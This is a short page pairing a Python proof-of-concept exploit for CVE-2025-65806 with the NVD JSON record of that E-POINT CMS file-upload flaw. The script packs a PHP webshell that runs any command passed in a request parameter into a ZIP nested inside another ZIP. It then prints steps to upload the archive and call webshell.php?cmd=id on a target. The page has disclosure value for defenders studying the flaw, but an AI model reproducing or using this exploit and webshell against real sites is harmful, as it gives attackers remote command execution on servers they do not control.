CVE-2025-65806

#!/usr/bin/env python3 """ CVE-2025-65806 PoC - E-POINT CMS Nested ZIP File Upload RCE This PoC demonstrates the nested ZIP archive upload vulnerability. """ import zipfile import io import sys def create_webshell(): """Create a simple PHP webshell""" return b"<?php if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); } ?>" def create_nested_zip(): """ Create a nested ZIP file structure: outer.zip └── inner.zip └── webshell.php """ # Create the inner ZIP with webshell inner_zip_buffer = io.BytesIO() with zipfile.ZipFile(inner_zip_buffer, 'w', zipfile.ZIP_DEFLATED) as inner_zip: inner_zip.writestr('webshell.php', create_webshell()) inner_zip_data = inner_zip_buffer.getvalue() # Create the outer ZIP containing the inner ZIP outer_zip_buffer = io.BytesIO() with zipfile.ZipFile(outer_zip_buffer, 'w', zipfile.ZIP_DEFLATED) as outer_zip: outer_zip.writestr('inner.zip', inner_zip_data) return outer_zip_buffer.getvalue() def main(): print("[*] CVE-2025-65806 PoC - E-POINT CMS Nested ZIP Upload") print("[*] Generating nested ZIP payload...") nested_zip_data = create_nested_zip() # Save the PoC file output_file = 'CVE-2025-65806_nested_zip.zip' with open(output_file, 'wb') as f: f.write(nested_zip_data) print(f"[+] Created: {output_file}") print(f"[+] Size: {len(nested_zip_data)} bytes") print("[+] Upload this file through E-POINT CMS file upload feature") print("[+] After upload, access webshell.php via web browser") print("[+] Example: http://target.com/uploads/webshell.php?cmd=id") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-65806", "sourceIdentifier": "[email protected]", "published": "2025-12-04T20:16:19.563", "lastModified": "2026-03-11T21:16:11.257", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The E-POINT CMS eagle.gsam-1169.1 file upload feature improperly handles nested archive files. An attacker can upload a nested ZIP (a ZIP containing another ZIP) where the inner archive contains an executable file (e.g. webshell.php). When the application extracts the uploaded archives, the executable may be extracted into a web-accessible directory. This can lead to remote code execution (RCE), data disclosure, account compromise, or further system compromise depending on the web server/process privileges. The issue arises from insufficient validation of archive contents and inadequate restrictions on extraction targets."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:e-point:e-point_cms:eagle.gsam-1169.1:*:*:*:*:*:*:*", "matchCriteriaId": "441FDDBE-448F-4B80-B5FF-8585BF118A25"}]}]}], "references": [{"url": "https://github.com/Bidon47/CVE-2025-65806/blob/main/CVE-2025-65806.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.e-point.pl/produkty/e-point-cms", "source": "[email protected]", "tags": ["Product"]}]}}